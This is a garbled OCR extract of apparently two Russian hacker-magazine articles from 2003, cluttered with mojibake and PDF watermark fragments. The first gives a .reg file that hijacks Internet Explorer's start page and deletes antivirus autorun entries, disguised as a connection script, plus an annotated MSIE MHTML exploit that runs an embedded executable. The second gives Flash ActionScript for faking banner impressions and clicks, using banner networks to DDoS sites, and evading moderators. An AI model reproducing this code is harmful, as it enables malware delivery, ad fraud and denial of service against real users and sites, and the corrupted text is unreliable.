В свое время также был очень популярен халявный доступ в инет через сети x25, который раздавали некоторые добрые хакеры. Так вот, чтобы настроить доступ, юзеру нужно было слить файло с коннекшн скриптом и установить его себе. Кто мешает выдать наш reg-файл за такую же мазу? Ведь, как показывает практика, юзеры редко заглядывают в содержание таких файлов.

Вот какой reg-файл намутил Дронич:

Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main]

«Local Page»=«C:\\WINNT\\System32\\xakpage.htm»

;Ýòî åñòü òà ñтраничка, êоторая çагрузится, åñëè ó þçåðà âообще îтключен õоумпейдж :).

;Ñтрашное çападло :), òàê êàê about:blank ìîæíî îтключить òолько èç êо- мандной ñтроки (iexplore.exe -nohome), à ýòî íå âñåì äàíî.

«Start Page»=«http://www.pipets.ru » ; Ýòî òà ñàìàÿ ñтартовая ñтраница.

«Search Page»=«http://www.pipets.ru »

;Ýòî ñтраница, íà êоторую þçåð ïеренаправляется, åñëè âведенный èì óðë ãолимый и âключен àвтопоиск.

;Ïрактика ïоказывает, ÷òî îтключают åго только ïродвинутые ëþäè.

«FullScreen»=«yes»

; Sevranty è òàê ïредусмотрел ôулскрин, но ìîæíî åùå ïодстраховаться :)

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] «SpIDer»=-

;À ýòà õåðü óдаляет ÄокторВеба

;Àналогично ìîæíî ðазобраться ñ Êаспером.

;[-HKEY_LOCAL_MACHINE\SOFTWARE\Micro- soft\Windows\CurrentVersion\Run]

;À âîò ýòî ÷истый òермояд - óдаляет ÂСЕ запускаемое ñ ïравами ìашины

;Ìожешь ñíÿòü ñ íåãî ÐÅÌ íà ñâîé ñòðàõ è ðèñê :).

Заметь, что такой РЕГ-файл поменяет только юзерские настройки. Если ты хочешь замутить настоящее зло, поменяй ключ

HKEY_CURRENT_USER íà HKEY_LOCAL_MACHINE – он гораздо козырней и поменяет паги сразу для всех юзеров. Кстати, обратная замена возможна только таким же путем – через регедит.

СВЕЖИЕ ДЫРЕНИ

Но, само собой, столь ненадежные методы Донора не удовлетворили, и он полез по bugtraq’ам и был сражен буквально наповал свеженькими дырами от MSIE (читай «мясо»).

Первый баг грозит охотникам за флэш-муль- тиками. Оказывается, когда мясо загружает какой-нибудь мультимедиа-файл, оно генерит отдельную страничку и при этом ни фига не фильтрует линк на файло, который ему пихнули. Так что если к линку на флэшку приписать скрипт, осел его безропотно выполнит.

Например урла http://www.macromedia.com//shockwave/download/triggerpages_mmcom/flash.swf?»><SCRIPT>alert(d ocument.cookie)</SCRIPT>

запишет тебе на тачку куку. Подробнее читай здесь: http://www.securityfocus.com/bid/6481/discussion/

Второй глюк - это вообще песня! Называется бага self-executing html file. Дыра заклю- чается в том, что если прямо в хытымыльку воткнуть исполняемый файл и небольшой скрипт, то при открытии его ишаком, последний его с удовольствием исполнит. Работает бага для всех Виндов и ослов пятой и шестой версий. Подробнее читай здесь:

http://www.securityfocus.com/bid/6961 http://www.securityfocus.com/archi- ve/1/313355/2003-02-27/2003-03-05/0

А коменты Дронича помогут тебе въехать, что тут и как:

024

april/04/2003

 

 

 

 

hang

e

 

 

 

 

 

 

 

C

 

E

 

 

 

 

X

 

 

 

 

 

 

-

 

 

 

 

 

d

 

 

F

 

 

 

 

 

 

t

 

 

D

 

 

 

 

 

 

 

i

 

 

 

 

 

 

 

 

 

r

P

 

 

 

 

 

NOW!

o

 

 

 

 

 

 

 

 

 

 

 

 

BUY

 

 

 

 

 

 

to

 

 

 

 

 

w Click

 

 

 

 

 

m

 

 

 

 

 

 

w

 

 

 

 

 

 

 

 

 

 

w

 

 

 

 

 

 

 

o

 

 

.

 

 

 

 

 

 

.c

 

 

 

p

 

 

 

 

g

 

 

 

 

 

df

 

 

n

e

 

 

 

 

 

-xcha

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

hang

e

 

 

 

 

 

 

 

 

C

 

E

 

 

 

 

 

X

 

 

 

 

 

 

 

-

 

 

 

 

 

d

 

 

 

F

 

 

 

 

 

 

t

 

 

 

D

 

 

 

 

 

 

i

 

 

 

 

 

 

 

 

 

r

 

P

 

 

 

 

 

NOW!

o

 

 

 

 

 

 

 

 

 

 

 

 

 

 

BUY

 

 

 

 

 

 

 

to

 

 

 

 

 

,

w Click

 

 

 

 

 

m

 

 

 

 

 

 

 

w

 

 

 

 

 

 

 

 

HTTP ÎÂÛÉ DNSw.

 

 

 

 

 

.co

 

 

 

 

p

 

 

 

 

g

 

 

 

 

 

 

df

 

 

n

e

 

 

 

 

 

 

-x cha

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

//REMS by Dronich

//Стандартный çаголовок ïочтовика. MIME-Version: 1.0

//Далее èäåò îписание ôàéëà, ïрописанного в òåëå ïисьма êàê àттачмент. Content-Location:file:///malware.exe

//Закодирован îí ïî áåéç64, ñàìûé êлевый способ êодирования. Content-Transfer-Encoding: base64

//Непосредственно ôàéë. Èмпортируй åãî â почтовик, è òû óвидишь ÀÑÊÈÈ.

//Первые äâà ñимвола - MZ - ýòîãî íàì äо- статочно, ÷òîáû ïонять, ÷то //файло èсполняемое. Íå-ÀÑÊÈÈ ñимволы â ÁÀÒå íå óвидеть :(.

//EXEbegin

TVpEAQUAAgAgACEA//91AAACAACZAAAAPgAAAA-

EA+zBqcgAAAAAAAAAAAAAAAAAAAAAAAA

...

è åùå äî ôèãà áелиберды...

...

PzY/Pzc/Pzg/Pzk/Pzo/Pzs/Pzw/Pz0/Pz4/Pz8/Pz8=

//EXEend

//Верхушка ïàãè :). Âñå ïî-ëамоботски просто.

<!— 25.02.03 - http://www.malware.com > <title>malware.com</title>

<body bgcolor=black scroll=no>

//Óãó. Ñкриптик. Ñмотрим, ÷òî äелают:

<SCRIPT>

//25.02.03 - http://www.malware.com

//Описываем ôункцию. function malware()

{

//Â s êладем ïóòü ê ôàéëó. s=document.URL;

// path êладем òó ÷àñòü s, êоторая äо последних ñлэшей (òî áèøü ÷èñòî ÏÓÒÜ). path=s.substr(-0,s.lastIndexOf(«\\»));

//Åñëè áûëè ESC-chars - óбиваем. path=unescape(path);

//Вписываем â òåëî ÕТМЛки ñледующее (вообще äолжна áûòü îäíà ñтрока, íî ìû âсе равно êомпилить íå ñобираемся): document.write( ‘

Результаты поиска по запросу «Internet Explorer» на www.securityfocus.com

//Началась ÷истая косметика - òîëêó íикакого :) <title>

malware.com

</title>

<body scroll=no bgcolor=black>

<FONT face=«Comic Sans Mcolor=red sty- le=«position:absolute;top:20;left:90;z-in- dex:100; font-size:2cm;»>

malware.com

</center>

//À âîò òóò êосметика êончилась...

//È ïонеслась!.. Âнедрили îбъект ñ ìисти- ческим êëàññ-àéäè, ê êоторому òî÷íî íет описания â ðеестре.

//Стайл è àëüò - äëÿ êрасоты.

<object style=«cursor:cross-hair» alt=«moo ha hclassid=«clsid:66666666-6666-6666- 6666»

//Гвоздь ïрограммы! Ãоворим âèíäå, ÷то объект ñ òàêèì êлассом îбрабатывается прогой, ëежащей ïî àдресу:

CODEBASE=«mhtml:’+path+’\\malware.html!file:///malware.exe»>

//Òî åñòü íепосредственно â òåëå íашего письма :). Ïросто, êàê ïолбублика.

А чтобы запихать в этот эксплойт свой экзешник, который и замутит сатанинскую пати на отдельно взятом компе, надо воспользоваться самой хацкерской прогой всех времен и народов – TheBat’ом. Держи соляшен, чувак:

1.Создать новый ящик в Бате и сказать ему «Хранить аттаченные файлы в письме».

2.Написать письмо от кого угодно кому угодно.

3.Приаттачить к этому письму свой заподлянский экзешник.

4.Сохранить письмо в отдельный файл (экспортнуть, проще говоря).

5.Открыть файл блокнотом и скопировать аттач (его ты сразу узнаешь – он похож на хексовую белиберду :)).

6.Засунуть его туда, куда следует (то есть посреди моих комментов EXEbegin и EXEend).

Напоследок скажу, что мы не пытались сделать идеальную елду массового поражения, поэтому, возможно, у нашего военного HTTP DNS’а много недостатков. Если ты дружишь с головой и имеешь горячее желание, можешь принять участие в нашем open source проекте, так сказать, в ознакомительных целях. С удовольствием почитаем, каких результатов добился ты.

A

//Ñ ÷истой ñовестью çакрываем ñкобки è òåãè.

</object>

‘)

}

//À òеперь âызываем îписанную ôункцию ñ небобовой ÷астотой (ðàç â 150 ìñ) setTimeout(«malware()»,150)

</script>

//Âîò òàê âñå áанально. Êëþ÷è îò äîìà â машине, ìашина â ãараже, êëþ÷è îò ãаража дома :))).

//Вообще-то î÷åíü îригинально - çаставить обработчик îбрабатывать ñåáÿ ñамого. //Причем âèíäà íå çаорет, òàê êàê àäðåñ ê проге-îбработчику ëокальный, à çначит çа- проса íà çагрузку íåò :).

//À ðàç íîâûõ ïðîã íå èнсталлим - òî è орать íå íàäî :).

Вот так-то! Ишак - самый жирный троян на твоей тачке. Ура M$!!! Так что поиметь в сети можно фигову тучу народу. Я уж молчу про то, что можно вообще сатанизм устроить, например, форматнуть всем винты, но я бы не стал себя ради шутки под статью подводить.

page 025

 

 

 

 

hang

e

 

 

 

 

 

 

 

 

 

 

 

 

 

 

C

 

E

 

 

 

 

 

 

 

 

 

 

X

 

 

 

 

 

 

 

 

 

 

 

 

-

 

 

 

 

 

d

 

 

 

 

 

 

 

 

F

 

 

 

 

 

 

 

t

 

 

 

 

 

 

 

D

 

 

 

 

 

 

 

 

i

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

r

 

 

 

 

 

P

 

 

 

 

 

NOW!

 

 

o

 

 

 

 

 

 

 

 

 

 

BUY

 

 

СЕТЕВОЕ МОШЕННИЧЕСТВО

 

w

 

 

to

 

 

 

 

 

 

w Click

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

o

m

 

w

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

.

 

 

 

 

g

.c

 

 

 

 

 

 

 

 

p

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

df

 

 

n

e

 

 

 

 

 

 

 

 

 

 

-xcha

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

hang

e

 

 

 

 

 

 

 

C

 

E

 

 

 

 

X

 

 

 

 

 

 

-

 

 

 

 

 

d

 

 

F

 

 

 

 

 

 

t

 

 

D

 

 

 

 

 

 

 

i

 

 

 

 

 

 

 

 

 

r

P

 

 

 

 

 

NOW!

o

 

 

 

 

 

 

 

 

 

 

 

 

BUY

 

 

 

 

 

 

to

 

 

 

 

 

w Click

 

 

 

 

 

m

 

 

 

 

 

 

w

 

 

 

 

 

 

 

 

 

 

w

 

 

 

 

 

 

 

o

 

 

.

 

 

 

 

 

.c

 

 

 

p

 

 

 

 

g

 

 

 

 

 

df

 

 

n

e

 

 

 

 

 

-x cha

 

 

 

 

ДЕСТРУКТИВНЫЙ

ÊÎÄ Â FLASH >

Как-то на предыдущих занятиях мы проходили DDOS-атаку, и был упомянут способ использования баннеров для наших благородных целей. Сегодня мы разберем эту тему

имеем баннер, который

поподробнее.

имеет всех

 

Alex Shark (qqqqqwww@ring.by)

Кто нас будет раскручивать? Итак, для на- чала, что может быть использовано для DDOS с использованием баннерообменных сетей? Во-первых, это, конечно, HTML-бан- неры, во-вторых, это Flash-баннеры. HTMLбаннеры представляют собой не что иное, как обычную страничку, только очень компактную и маленькую. Как правило, грузятся внутри тегов <iframe>. Баннеры на основе Flash это тоже HTML-баннеры, но в структуре HTML ничего не записано, это всего-навсего загрузчик swf файла.

Как всегда, перед боем следует основательно подготовиться. Для написания flash советую поставить 4-ую, а лучше 5-ую версию Macromedia Flash, поскольку многие баннерообменные сети не принимают в оборот баннеры, написанные на 6-ом Flash. Для написания HTML-баннеров можешь использовать что угодно, мое предпочтение это FAR. Теперь давай определимся с целью. Их может быть несколько: можно загрузить до потери пульса какой-нибудь сервер, если на сервере есть возможность регистрации, то это просто прелестно. Можно сделать жестокую накрутку своего сайта или счетчика

или даже не своего, если тебе пообещали заплатить за клики, то сколько раз твой баннер покажут, столько по нему и кликнут. В общем, простор для фантазии достаточно велик. Теперь давай разберемся с несколькими возможными жертвами, проще говоря, с баннерообменными сетями.

reklama.uz

Представляет собой страшное детище программиста и дизайнера, вернее людей считающих себя таковыми. Явное преимущество - это слабый контроль за выставляемыми баннерами, ну скажите, кто будет ковырять ваш баннер до потери пульса, если ковыряльщиков всего двое? Его запустят, потыкают и убедятся, что вроде все нормально, на чем и успокоятся. Так что для полевых испытаний это наиболее подходящий кандидат, трафика бешенного не даст, но проверить систему в бою позволит. Помимо картиночных баннеров принимает HTML, Flash, CGI. Форматы 468x60, 100x100, 120х60, 120х600. Из форматов следует выбирать не тот, что по-

больше, нас не интересует графическая красота баннера, а тот, у которого показов больше. Так, если меняют 10 наших показов 468х60 на 20 их показов 100х100, то ты должен вешать у себя 468х60, а боевую модель готовить 100х100. Как делать клоны сайтов, я думаю, объяснять не стоит, главное набрать показов и побольше.

ÌÀÐÊ-ÈÒÒ

Ну да ладно, вот и следующий кандидат (BANNERS.MARK-ITT.RU). Оный предоставляет возможность размещения горизонтальных баннеров 68х60, 100х100, 120х60, 226х131, Flash и вертикальных 234x60, 120x90, 125x125, 120х240, 120х600 и 160x600. Аналогичный контроль, то есть запугивание по полной, и фактически все пустые слова. По показам они будут получше, так, например 468х60 был показан 15828 раз за день, а 100х100 всего 8264 за день. Это, конечно, не Яндекс и не Yahoo, но на простенький внутрифирменный сервачок уже хватит. Главное отличие от предыдущего кандидата это не фокусированный на Узбекистане контингент, то есть IP-адреса бедолаг будут более разношерстными, а зна- чит и суммарный трафик будет больше.

Монстры LBE и RLE

Тут уже с контролем получше, так что не стоит заливать явно бажный HTML-баннер. Тут надо действовать осторожнее, подгружать JavaScript файлы со своего сервера тебе уже не дадут, да и к загрузке картинки не очень хорошо отнесутся, могут вежливо попросить изменить адрес с относительного на абсолютный, но и трафик у них побольше будет. На момент написания статистика следующая: LBE - 2741610 показов, LBE-lite - 1244404, LBE-100 - 3586869, RLE - 24772338. Как ты уже, наверное, заметил, для домашнего сайтика это не просто поток и даже не горная река, это все равно что планетой по комару врезать. Так что тут война уже идет по-крупному, таким трафиком, как уже писалось, был завален украинский сайт обмена баннеров. На всякий случай напомню, что для каждой баннерообменной сети тебе придется сделать «левое» мыло, «левый» сайт - и не какой-нибудь, а толковый и удовлетворяющий правилам баннерообменки (можешь просто его спереть :)).

Стадии лома

Хорош расслабляться, давай поговорим о деле, конкретно, что нам надо. Есть нес-

026

april/04/2003

 

 

 

 

hang

e

 

 

 

 

 

 

 

C

 

E

 

 

 

 

X

 

 

 

 

 

 

-

 

 

 

 

 

d

 

 

F

 

 

 

 

 

 

t

 

 

D

 

 

 

 

 

 

 

i

 

 

 

 

 

 

 

 

 

r

P

 

 

 

 

 

NOW!

o

 

 

 

 

 

 

 

 

 

 

 

 

BUY

 

 

 

 

 

 

to

 

 

 

 

 

w Click

 

 

 

 

 

m

 

 

 

 

 

 

w

 

 

 

 

 

 

 

 

 

 

w

 

 

 

 

 

 

 

o

 

 

.

 

 

 

 

 

.c

 

 

 

p

 

 

 

 

g

 

 

 

 

 

df

 

 

n

e

 

 

 

 

 

-xcha

 

 

 

 

колько финальных стадий, которые мы хотим с тобой получить.

Первая стадия - это кумулятивный показ. Кумулятивный - это когда из 1 ты делаешь 2, из 2 делаешь 4 и т.д. То есть саморастущая прибыль. Для осуществления сего требуется не сильно широкий канал, не очень большой сайт, да и вообще мало что требуется. Будем делать с тобой из показов показы. Допустим, у нас есть 1 показ, это гарантирует, что твой баннер где-нибудь покажется, но показы считаются только с твоего сайта, значит надо, чтобы внутри твоего баннера показался твой сайт (как минимум - твой баннер на твоем сайте). Самый простой (сразу оговорюсь, он не прокатит) способ для HTML-баннеров - это сделать внутри своего баннера <iframe> вставку с твоим сайтом. Но этот вариант умрет еще в зародыше, аналогично погибнет открытие второго фрейма, так что выкинь этот детский лепет из головы.

Вторая стадия - это накрутка счетчика, тут достаточно (как правило), чтобы картинка счетчика просто загрузилась. Многие счет- чики слабо следят за referer ссылкой, хотя если это spylog, то тут лучше идти по способу баннера, то есть подделывать все (чуть ниже ты узнаешь, как это делать). Однако счетчик надо крутить не один раз за показ, а каждые 2-3 секунды, так что придется сделать мувик и на один из кадров подвесить action - крутилку счетчика.

Третья стадия наиболее грязная, но весьма пригодится спамерам, это глобальная раскрутка сайта. Как правило, ее можно

Помни, CTR выше 10% дают только порнобаннеры, а они запрещены!

использовать там, где платят за привлече- ние посетителей, а не за легальное и правильное привлечение посетителей. Проще говоря, для раскрутки порнухи. Делается все слишком просто, надо сделать в любом месте (лучше все же на центральном кадре мувика) action на загрузку страницы в области «_blank» или «_top», но чтобы об этом не узнали при проверке баннера, тебе придется дочитать статью :).

И наконец, глобальный натиск, завал канала сайта, или попросту заплевывание его запросами. Как ни странно, но осуществляется это проще, чем раскрутка баннера, зато защищать баннер от нососовательства в него придется более тщательно, поскольку нормального результата можно добиться, используя только глобалистов типа RLE или LBE, а там ребята получают килобаксы за проверку твоих творений, и будь уверен, при малейшем подозрении они тебя отшвырнут, просто так, на всякий случай. Престиж и имя для них высоко ценятся.

Рождение баннера

Итак, давай приступим к самому страшному и, в принципе, самому трудному. Давай сделаем баннер. Прежде всего, необходимо сделать мыло, халявное и не обязательно красивое. Маленький секрет, регистрируйся везде от женского имени, меньше будет запарок при проверках. Затем надо создать/скатать сайт, любой, лишь бы он удовлетворял требованиям баннерообменки. Затем надо заказать код баннера и как следует в нем разобраться.

 

 

 

 

 

hang

e

 

 

 

 

 

 

 

 

C

 

E

 

 

 

 

X

 

 

 

 

 

 

-

 

 

 

 

 

d

 

 

F

 

 

 

 

 

 

t

 

 

D

 

 

 

 

 

 

 

 

i

 

 

 

 

 

 

 

 

 

 

r

P

 

 

 

 

 

 

NOW!

o

 

 

 

 

 

 

 

 

 

 

 

 

 

 

BUY

 

 

 

 

 

 

 

to

 

 

 

 

 

w Click

 

 

 

 

 

 

 

 

 

 

 

 

m

ДЕСТРУКТИВНЫЙ КОД В FLASH

 

 

 

 

 

 

 

 

w

 

 

 

 

 

 

 

 

o

 

 

w

 

 

 

 

 

 

 

 

 

 

.

 

 

 

 

 

 

.c

 

 

 

p

 

 

 

 

g

 

 

 

 

 

 

df

 

 

n

e

 

 

 

 

 

 

-x cha

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

Код RLE-баннера

<iframe src=http://www.linkexchange.ru/cgi-bin/er- le.cgi?FFFFFF?ZZZ frameborder=0 vspace=0 hspace=0 width=468 height=60 marginwidth=0 marginheight=0 scrolling=no>

<a href=http://www.linkexchange.ru/users/027486/goto.map target=_top>

<img src=http://www.linkexchange.ru/cgi-bin/rle.cgi?FFFFFF?ZZZ alt=«RLE Banner Network» border=0 height=60 width=468></a></iframe>

Action в Мувике

1.head = "GET http://www.linkexchange.ru/cgibin/erle.cgi?FFFFFF?ZZZ HTTP/1.0\nConnection: keep-alive\n";

2.agent = "User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98) IE 5.0 [ru]\n";

3.to = "Host: www.linkexchange.ru\n";

4.back = "Accept: text/html, image/jpeg, image/gif, */*\nAccept-Language: ru, en\nAccept-Charset: windows1251;q=1.0, *;q=0.1\n";

5.referer = "Referer: http://www.ru/eng/index.html\n\n";

6.packet = head+agent+to+back+referer;

7.Sock = new XMLSocket();

8.if (Sock.connect("ip_of_proxy", 8080)) {

9.Sock.send(packet);

}

page 027

 

 

 

 

hang

e

 

 

 

 

 

 

 

C

 

E

 

 

 

 

X

 

 

 

 

 

 

-

 

 

 

 

 

d

 

 

F

 

 

 

 

 

 

t

 

 

D

 

 

 

 

 

 

 

i

 

 

 

 

 

 

 

 

 

r

P

 

 

 

 

 

NOW!

o

 

 

 

 

 

 

 

 

 

 

 

 

BUY

 

 

 

 

 

 

to

 

 

 

 

 

w Click

 

 

 

 

 

m

 

 

 

 

 

 

w

 

 

 

 

 

 

 

 

 

 

w

 

 

 

 

 

 

 

o

 

 

.

 

 

 

 

 

.c

 

 

 

p

 

 

 

 

g

 

 

 

 

 

df

 

 

n

e

 

 

 

 

 

-xcha

 

 

 

 

 

 

 

 

hang

e

 

 

 

 

 

 

 

C

 

E

 

 

 

 

X

 

 

 

 

 

 

-

 

 

 

 

 

d

 

 

F

 

 

 

 

 

 

t

 

 

D

 

 

 

 

 

 

 

i

 

 

 

 

 

 

 

 

 

r

P

 

 

 

 

 

NOW!

o

 

 

 

 

 

 

 

 

 

 

 

 

BUY

 

 

 

 

 

 

to

 

 

 

 

 

w Click

 

 

 

 

 

m

 

 

 

 

 

 

w

 

 

 

 

 

 

 

 

 

 

w

 

 

 

 

 

 

 

o

 

 

.

 

 

 

 

 

.c

 

 

 

p

 

 

 

 

g

 

 

 

 

 

df

 

 

n

e

 

 

 

 

 

-x cha

 

 

 

 

Грязный клик

if (random(100) > 95) {

getURL ("http://www.linkexchange.ru/cgi-bin/rle.cgi?FFFFFF?ZZZ", "_top");

}

Там, где стоит FFFFFF, будет твой персональный номер, а вместо ZZZ должно быть случайное число. Лучше сделать несколько страниц, примерно штук 5, тогда и отдача будет больше (коэффициент накрутки). Все, первая часть пройдена. В Flash есть очень хорошая вещь, называется XMLSocket, она позволяет создавать коннект и отправлять любые данные на любой сервер; единственное ограниче- ние - это номер порта должен быть больше 1024, поэтому тебе придется найти проксик. Не ищи анонимный, ищи самый обычный, который пересылает referer и IP, именно он вызовет меньше всего вопросов. Теперь давай возьмемся за грязное программирование. Сделай баннер, не обязательно красивый и кликабельный, нам это не интересно, главное, опять-таки, чтобы он внешне удовлетворял всем требованиям, то есть не моргал, чтобы на нем не было голых дефачек и т.п. Вставляем в него мувик и где-нибудь посерединке вешаем следующий код (номера строк тут просто для наглядности, не вздумай их вбивать :)).

Разберемся, что мы делаем. С первой по пятую строку описываем то, что от нас хо- чет сервер. В шестой собираем все это в одну кучу. Седьмой создаем ту самую вол-

шебную посылалку (сокет). Восьмой проверяем, есть ли контакт. Девятая - «есть контакт», шлем все, что мы тут делали.

Никогда не используй свой сайт и баннер с него в целях накрутки, закроют и всем наябедничают

Все, мы показали наш баннер, по крайней мере, сервер так думает. Если хочешь, чтобы ZZZ всегда сам менялся, добавь random(999) при генерации head. Можешь сделать массив referer, ведущий на разные разделы твоей странички, и выбирать из него случайным образом одну строку. В общем, движок у тебя есть, дорабатывай, растачивай, делай с ним, что хочешь. Можешь добавить случайное срабатывание «клика», но не делай больше, чем 5%, это и так слишком высокий уровень отклика. Чистый клик, без открытия страницы, делается точно так же, как и показ, только нужно вписать чуть-чуть другую строку в переменную head. Если же тебе надо, чтобы страничка открылась в реале, то используй «грязный клик».

Со счетчиком все обстоит точно так же, только выбирай счетчик без JavaScript и помни, что ты меняешь показы баннера на накрутку счетчика, так что надо еще и бан-

нер чуть-чуть подкручивать. Ну а для завала сайта смело втыкай вместо ссылки на твой баннер ссылку на файл с сайта жертвы, советую выбирать файл пожирнее. Если на том сайте есть Flash, можно использовать подзагрузку его флеша к себе в баннер; если есть звук (mp3, например), можно и его подгрузить как мувик, тут тебе не важен результат загрузки, важна сама загрузка :). Давай прикинем: на моем любимом RLE вчера было 24772338 посетителей, это чуть больше 286 посетителей в секунду, средний объем swf-ки 30 кило, что есть 8.5 метров в секунду. Весьма нехилая выделенка, если же учесть, что помимо тебя с этого сайта еще кто-то будет пытаться что-то скачать, то выходит очень большой трафик. В принципе одним файлом mp3 можно завалить среднего провайдера или картинкой jpg эдак кило на 200 :). А че, у них же канал широкий, они любят вешать картинки неподъемные ;). Главное при завале - не пользоваться XMLSocket-ом, потому как наиболее вероятно, что первым ляжет именно проксятник, а не сильная жертва. Если на сайте жертвы есть регистрация чего-либо, то можно сделать случайную регистрацию полумиллионной аудитории пользователей, что приведет не только к забиванию канала, но забьет диск сервера и загрузит проц.

Таможня

А теперь ты узнаешь страшное: как тебя будут шмонать в мент... то есть у баннарейщиков. Во-первых, глянь на свой swf в текстовом виде, и ты увидишь все свои строчки, что неправильно по определе-

028

april/04/2003

 

 

 

 

hang

e

 

 

 

 

 

 

 

C

 

E

 

 

 

 

X

 

 

 

 

 

 

-

 

 

 

 

 

d

 

 

F

 

 

 

 

 

 

t

 

 

D

 

 

 

 

 

 

 

i

 

 

 

 

 

 

 

 

 

r

P

 

 

 

 

 

NOW!

o

 

 

 

 

 

 

 

 

 

 

 

 

BUY

 

 

 

 

 

 

to

 

 

 

 

 

w Click

 

 

 

 

 

m

 

 

 

 

 

 

w

 

 

 

 

 

 

 

 

 

 

w

 

 

 

 

 

 

 

o

 

 

.

 

 

 

 

 

.c

 

 

 

p

 

 

 

 

g

 

 

 

 

 

df

 

 

n

e

 

 

 

 

 

-xcha

 

 

 

 

 

 

 

hang

e

 

 

 

 

C

 

E

 

 

X

 

 

 

 

 

-

 

 

 

 

d

 

F

 

 

 

 

 

t

 

D

 

 

 

 

 

i

 

 

 

 

 

 

r

P

 

 

 

 

NOW!

o

 

 

 

 

 

 

 

 

 

BUY

 

 

 

 

to

 

 

 

w Click

 

 

 

m

 

 

 

 

w

 

 

 

 

 

 

ДЕСТРУКТИВНЫЙ КОД В FLASHw.

 

 

 

.co

p

 

 

g

 

df

n

e

 

 

-x cha

 

 

нию. Их конечно можно закодировать, но потом твой мувик декомпильнут (или попробуют это сделать), но есть выход и из этого положения. Давай вынесем наш мувик с кликалкой в отдельный файлец, назовем его «fly0.swf» и сделаем точно такой же, но без кликалки, просто летаю-

Не делай тяжелые баннеры, от их объема зависит реальное количество показов

щую фиговину; или можешь сделать мувик, со знаком зодиака, который постоянно будет меняться, или цену на товар, который ты якобы продаешь, ну подумай, зачем реально нужно выносить мувик, и постарайся закосить под это. А в основном баннере используй loadMovieNum («http://mypage.ru/fly0.swf», 3); для «дозагрузки» кусочка. Во время проверки на твоем сервере должен лежать нормальный не кликающий мувик с обычной летающей мухой. Когда проверка пройдена и баннер выпущен на просторы, начи- сляй на него показы, устанавливай время показа с 2 ночи до 6 утра и смело подменяй мувик. Все, с утра ты уже проснешься с бешеным количеством показов (если, конечно, все сделал правильно). Можно не выносить мувик, а вынести только сами переменные,

для этого есть load- V a r i a b l e s ( « d a - ta.txt», 0); он нам поможет избавиться от лишних строк, но не избавит нас от декомпиляции, зато можно задать условие, что, мол, если переменные не считались, то я обычный мувик, иначе кликать! Но лучше всегда счи- тывать «правильные» переменные: цены, скорость передачи данных, загрузку канала, и прочий кал. И грамотно выдавать его на экран. Тогда не должно быть вопросов типа «а за- чем вам скачивать это со своего сервера» или «а давайте мы их посмотрим», можно смело дать им файлец, и пусть ребята хоть зачитаются. Но в

идеале нужно написать перловку, кото-

Теперь бесплатный путь. А кто, собствен-

рая будет выкидывать данные в нужном

но, нам мешает послать наш «супербан-

формате до определенного времени, при-

нер», только в уменьшенном 1x1 варианте

том более или менее правдоподобные

 

в аттаче, в письмеце с тупым спамом? Ту-

данные. А с 2 до 6 будет давать сама ссы-

пым именно для того, чтобы никто не раз-

лки на разные баннеры (помнишь про

бирался, а просто посмотрел и грохнул.

random в конце баннера?) и разные refe-

Можно сделать менее болезненно, просто

ral. А чтобы даже после декомпиляции

спросить у друзей-знакомых 10-20 пока-

трудно было сообразить, что к чему, сове-

зов для «обкатки баннера». В принципе,

тую разнести всю эту требуху как можно

ты их вернешь :))). Можно просто втупую

дальше по мувикам. И не забывай про оп-

накрутить, достаточно создать сайт из 20

цию «защитить от экспорта», она хоть

страниц и недельку самому на него похо-

как-то, но тоже создаст проблему.

 

дить, но это вариант для тех, у кого хоть

 

 

где-то есть халявный Инет. Ну и послед-

 

 

нее, это холостые сайты; достаточно ча-

Стартовый капитал

 

 

сто есть сайт, на который можно повесить

 

 

Все, есть движок, есть баннер и сайт с

баннер, да как-то незачем, например,

перлом, но нет стартового капитала. Да-

 

сайт твоей фирмы из 3-х человек. Если

вай попробуем сделать несколько пока-

такого нет, так придумай его, зарегистри-

зов. Для начала платный путь. Покупай

руй во всех поисковиках, до которых до-

себе карточку WM, делай кошелек и при-

тянутся руки, и 2-3 чела в день будет. По-

мерно за один буказоид ты сможешь пои-

ка ты будешь работать над созданием са-

меть 5000 показов RLE-Classic. Если

монакручивающегося мегауничтожителя,

учесть, что эти 5000 показов пролетят ми-

у тебя уже появится капитал. При мудром

нут за 5 (и это еще очень медленно), то к

подходе тебе хватит и 10 показов для за-

утру у тебя должно быть эдак лямов 20,

вала, например, narod.ru.

так что не слишком жадничай и старайся

 

накручивать как можно меньше, не забы-

A

вай про кумулятивный эффект, каждый

 

показ вызывает еще 3 показа.

 

 

page 029